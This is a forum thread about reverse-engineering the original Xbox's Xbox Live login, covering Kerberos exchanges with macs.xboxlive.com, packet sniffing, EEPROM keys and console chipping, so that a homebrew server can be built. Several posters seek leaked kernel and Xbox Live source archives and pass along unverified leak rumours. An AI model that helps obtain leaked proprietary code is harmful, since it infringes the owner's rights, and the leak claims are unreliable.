Open Source Xbox Live?

Work has calmed down a bit, so know i have time to get back into this.

To make any significant progress i need to find the list of trusted keys the xbox uses to connect to servers. I am going to go ahead and say this is probably in the dashboard binaries, as dashboard binaries were updated with xbox live features added. But that is just speculation, i could be very wrong.

So thats where i'm at now, i'm going to do some more research into where this information is located, but the dashboard is quite a bit to disassemble.

 

Probably the easiest way to find the keys is to use an FTP Transfer cable and dump everything off the xbox and comb each file.

 

Now I know nothing about the inner workings on XBL but please for the sake of the thread I impart to you a post by the great m0skit0

 

No real technical contribution post here.

Instresting stuff here. Xblob exsisted back in the xbox 1 period right? if you truely want it opensource, I dont think you can read the xdk manuals. or let someone extract the theories, and you write code against it. Like the FAT file system and Linux.

But Hell, every time I start looking into this still open up the XDK for easy testing. So maybe its opensource, but not legal, no direct Xbins download so to speak. (My english :'( )

 

I thought about this for the Xbox 360 a while ago, and I'm starting to look at it again. I really didn't accomplish anything due to my lack of networking knowledge, but I have read that a "HomeBrew-Net" Xbox Live environment has actually been made multiple times and applied to XDKs by using a modified ini to add in the servers in the environments. Apparently the people who made it some years ago had partial functionality with signing in and things, but no games.

Anyways, this seems like some cool stuff, good luck with this project!

 

I got a bit further today,

The xbox starts out by connecting to macs.xboxlive.com, where it verifies the serial number of the console. This is done via kerberos and the pricipals are set up as "serialnumber"@macs.xbox.com

yes the realm is macs.xbox.com, but the domain name is macs.xboxlive.com, i'm assuming the domain was changed afterwards.

I can get an xbox to log into a linux kerberos server, but i dont know the preauth password. It looks to be RC4 ecrypted, which is not the hardest to break. I would just rather find out where the password is located / generated. I bet it is some other identification number other than the serial, or perhaps it's private.


I wonder if the servers hosting xbox live were windows domain controllers, it's hard for me to imagine that. But again it is microsoft.

EDIT: and lovely, my xbox hard drive just crashed (click of death) good thing i have a chip on it's way.

 

Intresting progress alex, hope you can fix your xbox back to a working state.

 

How did you find out about macs.xbox.com/macs.xboxlive.com ? Are you sniffing packets?

 

Yes, from what i can gather MACS is for authorizing the serial numbers of the consoles, and AS.XBOXLIVE.COM is for user accounts. Although the kerberos protocol is standard on the xbox, the data is not. I can gather that some of it is rc4 encrypted and i am unsure what the rest of the data is at the moment.

Some of the console information is also transmitted over plain text.


On another note, the xbox is chipped and up and running.

 

Presumably Wireshark is your tool of choice to understand the structured or lightly modified Kerberos protocol packets? Wireshark does have a quick prototyping Lua packet dissector engine if you find you can piece apart the XBOX-Kerberos.

Others are looking at similar steps e.g. https://forums.hak5.org/index.php?/...ts-with-wireshark-and-ettercap-g/#entry215432

 

Does anyone have any idea what information is actually contained in the eeprom? I'm not home at the moment, but i had an idea revolving around the eeprom.

 

Copy and paste from another site since I couldn't remember everything ...

*XBOX VERSION
*KERNEL VERSION
*RAM SIZE
*XBOX SERIAL
*MAC ADDRESS
*ONLINE KEY
*VIDEO STANDARD
*XBE REGION
*HDD KEY
*CONFOUNDER
*HDD MODEL
*HDD SERIAL
*HDD PASSWORD
*XBOX DVD MODEL

 

That would a lot of sense. When disassembling XOnline.xbe you can't find a lot of references to a function that looks like it reads all of this data from the eeprom.

This should make it a bit easier to locate what it is using for authentication, hopefully it isn't a generated passphrase based on chaining variables.

 

The entire source code to Xbox Live leaked along with the kernel and SDK libraries. Disassembly is overkill =)

 

Where?

 

It showed up on usenet years ago disguised as something else and went unnoticed. No idea if it's public now. Many BIOS were based on the kernel source and not just hacked via the binary.

 

Yes, I've heard tangential references to it leaking. Never seen the full dump myself.

 

As have i, although it would be a godsend if it did exist. I guess ill keep my finger crossed.

 

This sounds good. While XBConnect is good I almost never see anyone online for the classic box. Those who are seem to be playing Halo only...

 

EDIT: below is the original message, but at current time, we have found and shared multiple archives for kernel sources and more. ive been rereading this thread and to prevent future people from doing more reading than necessary, look for 4400 and or Barnabas sources. other names and more archives probably exist. ive gotten multiple ways of proof for those to exist.

I never found live source, no kernel source at all, so if any names (of the obfescated files) or old(dead) links are known, then i have leads to find files. news i knew and now still can find are about some "hackers"(more crackers to me) to have teamview access and "leaked" usernames. no code or examples so far, no proof at all. also unconfirmed claims M$ blocked or removed silently any leads. if source exsists, and you have own(ed) it, can you share how and/or (somewhat) where you found it?

I am aware of some rules on the board may not allow linking to pirate software, and so please PM me full links Only by pm, but better to comply: give a hint as I said by names, release group names or usenet host stuff. Google and bing are no use so far.

I have to consider this a hoax otherwise and continue (next to university) my own research/reverseengineering.